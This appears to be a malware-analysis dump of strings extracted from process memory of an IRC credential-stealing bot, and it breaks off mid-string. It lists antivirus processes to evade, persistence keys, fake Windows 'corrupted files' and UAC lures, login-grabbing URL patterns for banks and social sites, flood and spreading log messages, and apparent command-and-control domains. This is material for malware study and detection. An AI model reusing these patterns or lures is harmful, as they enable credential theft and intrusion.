pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre><b>notepad.exe_1520_rwx_00950000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\notepad.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\notepad.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>jqs.exe_348_rwx_010C0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.p